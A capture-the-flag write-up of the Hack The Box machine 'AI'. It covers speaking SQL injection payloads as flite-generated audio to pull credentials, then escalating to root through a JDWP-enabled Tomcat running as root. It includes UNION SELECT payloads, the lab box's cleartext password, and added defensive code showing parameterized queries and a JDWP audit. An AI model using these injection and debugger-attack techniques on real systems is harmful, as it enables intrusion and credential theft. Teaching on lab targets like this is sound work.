Hey guys. AI from Hack The Box was retired today and here is my write-up about it.

Quick Summary 

AI is a Linux medium machine and its IP address is 10.10.10.163. It is a really fun machine.

For the user path it is about uploading a wav file to the web server, using SQL injection (spoken in the audio) to get the credentials from the database, and logging in over SSH.

For privilege escalation, Tomcat is running as root with the Java Debug Wire Protocol (JDWP) agent enabled, and we exploit that. So let's jump in.

Nmap 

As always we start with nmap to scan for open port and services. 

```
root@ch4n:~# nmap -sC -sV 10.10.10.163
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:25 EST
Nmap scan report for 10.10.10.163
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds
```

In our nmap scan there are two open ports: SSH on port 22 and HTTP on port 80.

Nothing else was interesting in nmap, so let's check the web page.

Web Page 

After playing around on the web page I found ai.php.

It says to drop your query using a wav file.

So here we need to upload a wav file.

I want to explain something about converting text to a wav file here.

At first I used an online tool, https://www.text2speech.org/, but it does not work for long sentences.

The AI can't understand them, so for long sentences I had to split the audio in Audacity, which is annoying to do.

So I looked for a better tool and found flite.

The web page mentions a query, so I thought it might be voice SQL injection. Actually I didn't expect that, but it was really fun.

So I tested with:

```
open single quote
```

Convert it to a wav file:

```
flite -o open-single-quote.wav -t "open single quote" -voice rms
```

Here we get an SQL injection error.

Let's pull the creds :-)

I used some commas and spaces to make it speak slowly.

```
root@ch4n:~/Desktop/htb/boxes/AI# flite -o user.wav -t "open single quote, union, select, username, from, users, comment, database" -voice rms
```

Here we get the username:

```
alexa
```

Do the same thing for the password :-)

```
root@ch4n:~/Desktop/htb/boxes/AI# flite -o pass.wav -t "open single quote, union, select, password, from, users, comment, database" -voice rms
```

Here we get the password:

```
H,Sq9t6}a<)?q93_
```
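The injection above works because the transcribed speech is concatenated straight into the SQL query, so a quote followed by a UNION changes the statement instead of being treated as a value. The following is an added example, not code from the write-up or from the box: it uses an in-memory sqlite3 database with a constructed `queries` table and `users` table, assumes the application does a simple `WHERE text = '...'` lookup of the transcribed string, and shows the vulnerable concatenation beside the parameterized version. The `PAYLOAD` string is a constructed rendering of the spoken words in the write-up.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the box's database (not the real schema).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('alexa', 'example-secret')")
    con.execute("CREATE TABLE queries (id INTEGER PRIMARY KEY, text TEXT)")
    con.execute("INSERT INTO queries (text) VALUES ('hello')")
    return con


def vulnerable_lookup(con, transcribed):
    # Vulnerable: the transcribed speech becomes part of the SQL statement itself.
    sql = "SELECT text FROM queries WHERE text = '" + transcribed + "'"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con, transcribed):
    # Hardened: the transcribed text is bound as a parameter, so the driver sends it
    # as a value and it can never alter the statement structure.
    sql = "SELECT text FROM queries WHERE text = ?"
    return [row[0] for row in con.execute(sql, (transcribed,))]


# Constructed: what the spoken words "open single quote, union, select, username,
# from, users, comment" become once transcribed into SQL text (assumption).
PAYLOAD = "' UNION SELECT username FROM users-- "


def demo():
    con = make_db()
    return {
        "vulnerable_normal": vulnerable_lookup(con, "hello"),
        "vulnerable_payload": vulnerable_lookup(con, PAYLOAD),
        "safe_normal": safe_lookup(con, "hello"),
        "safe_payload": safe_lookup(con, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Against the vulnerable function the payload returns the `users.username` row, exactly the leak seen on the box; against the parameterized function the same input is just a string that matches nothing, so the fix is to bind the transcribed text as a parameter rather than to filter the audio.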

I just logged in over SSH and grabbed the user flag.

Privilege Escalation

I ran pspy and found that Java (Tomcat) is running as root with the JDWP debug agent enabled:

```
2019/11/10 17:52:03 CMD: UID=0    PID=14442  | /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
2019/11/10 17:52:07 CMD: UID=1000 PID=14465  | sudo -u mrr3boot vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash
2019/11/10 17:52:07 CMD: UID=4000000000 PID=14466  | vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash
```

After googling about JDWP exploitation, I found the exploit and a wonderful article:

https://ioactive.com/hacking-java-debug-wire-protocol-or-how/

https://www.exploit-db.com/exploits/46501
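What makes this a root path is the combination in that pspy line: a JVM running as UID 0 with `-agentlib:jdwp=...server=y`, so any local user who can reach the debug port gets a debugger attached to a root process. As an added example (not from the write-up, the exploit, or the box), here is a small audit script that parses pspy-style process lines, picks out the JDWP agent options, and rates the exposure from the owning UID and the bind address. The first two sample lines are taken from the pspy output above; the third is constructed, and the `address=*:5005` form is the JDK 9+ syntax for listening on all interfaces.

```python
import re

# JDWP agent options on a java command line, e.g.
# -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n
JDWP_RE = re.compile(r"-agentlib:jdwp=(\S+)")
# pspy line shape: "<date> <time> CMD: UID=<n> PID=<n> | <command line>"
PSPY_RE = re.compile(r"^\S+ \S+ CMD: UID=(\d+)\s+PID=(\d+)\s+\|\s*(.*)$")

LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")


def parse_jdwp_options(opts):
    # "transport=dt_socket,address=localhost:8000,server=y" -> dict
    return dict(kv.split("=", 1) for kv in opts.split(",") if "=" in kv)


def rate(uid, listening, local_only):
    # server=n means the JVM dials out to a debugger instead of accepting connections.
    if not listening:
        return "low: client-mode agent, no listening debug port"
    if uid == 0 and not local_only:
        return "critical: root JVM accepting debugger connections from the network"
    if uid == 0:
        return "high: root JVM accepting debugger connections from any local user"
    if not local_only:
        return "high: JVM accepting debugger connections from the network"
    return "medium: local-only debug port on an unprivileged JVM"


def audit_line(line):
    m = PSPY_RE.match(line)
    if not m:
        return None
    uid, pid, cmd = int(m.group(1)), int(m.group(2)), m.group(3)
    j = JDWP_RE.search(cmd)
    if not j:
        return None
    opts = parse_jdwp_options(j.group(1))
    address = opts.get("address", "")
    host, _, port = address.rpartition(":")
    # A bare port (address=8000) bound all interfaces on JDKs before 9, and "*" means
    # all interfaces on newer ones, so only an explicit loopback host counts as local.
    local_only = host in LOCAL_HOSTS
    listening = opts.get("server", "n") == "y"
    return {
        "pid": pid,
        "uid": uid,
        "address": address,
        "port": port,
        "listening": listening,
        "local_only": local_only,
        "risk": rate(uid, listening, local_only),
    }


def audit(lines):
    return [f for f in (audit_line(l) for l in lines) if f]


SAMPLE_LINES = [
    # From the pspy output in the write-up:
    "2019/11/10 17:52:03 CMD: UID=0    PID=14442  | /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start",
    "2019/11/10 17:52:07 CMD: UID=1000 PID=14465  | sudo -u mrr3boot vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash",
    # Constructed: an unprivileged JVM with a network-exposed debug port.
    "2020/01/25 21:30:00 CMD: UID=1000 PID=20001  | /usr/bin/java -agentlib:jdwp=transport=dt_socket,address=*:5005,server=y,suspend=n -jar app.jar",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_LINES):
        print(f"PID {finding['pid']} UID {finding['uid']} {finding['address']}: {finding['risk']}")
```

The same check works on `ps -eo uid,pid,args` output with a small change to `PSPY_RE`. The remediation the script points at is simple: remove the `-agentlib:jdwp` option from production launch scripts such as Tomcat's `setenv.sh`, or at least never run a JVM that carries it as root.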

After reading the exploit, I ran it and grabbed the root flag.

That's it guys.

Hope you enjoyed my write-up :-)

Don't forget to check the other write-ups on my blog.


Author

CH4N